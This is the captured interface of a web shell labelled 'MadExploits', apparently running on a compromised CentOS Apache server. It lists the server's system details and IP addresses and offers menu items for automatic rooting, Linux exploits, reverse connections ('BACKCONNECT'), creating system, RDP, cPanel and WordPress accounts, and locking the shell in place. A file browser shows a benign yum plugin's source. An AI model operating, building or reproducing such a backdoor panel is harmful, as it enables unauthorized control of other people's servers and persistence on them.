Linux localhost.localdomain 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 10.29.51.72 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
7.2.34
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
yum-plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
etckeeper.py
1.14
KB
-rw-r--r--
etckeeper.pyc
1.24
KB
-rw-r--r--
etckeeper.pyo
1.24
KB
-rw-r--r--
fastestmirror.py
17.98
KB
-rw-r--r--
fastestmirror.pyc
16.71
KB
-rw-r--r--
fastestmirror.pyo
16.71
KB
-rw-r--r--
langpacks.py
26.11
KB
-rw-r--r--
langpacks.pyc
24.66
KB
-rw-r--r--
langpacks.pyo
24.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : etckeeper.py
# # # author: jtang@tchpc.tcd.ie # # this plugin is based on the hello world example # from http://yum.baseurl.org/wiki/WritingYumPlugins # # to install, copy this file to /usr/lib/yum-plugins/etckeeper.py # and then create /etc/yum/pluginconf.d/etckeeper.conf with the contents # below. # # /etc/yum/pluginconf.d/etckeeper.conf: # [main] # enabled=1 # import os from glob import fnmatch import yum from yum.plugins import PluginYumExit, TYPE_CORE requires_api_version = '2.1' plugin_type = (TYPE_CORE,) def pretrans_hook(conduit): conduit.info(2, 'etckeeper: pre transaction commit') servicecmd = conduit.confString('main', 'servicecmd', '/usr/bin/etckeeper') command = '%s %s > /dev/null' % (servicecmd, " pre-install") ret = os.system(command) if ret != 0: raise PluginYumExit('etckeeper returned %d' % (ret >> 8)) def posttrans_hook(conduit): conduit.info(2, 'etckeeper: post transaction commit') if os.path.exists('/usr/bin/etckeeper'): servicecmd = conduit.confString('main', 'servicecmd', '/usr/bin/etckeeper') command = '%s %s > /dev/null' % (servicecmd, "post-install") os.system(command)
Close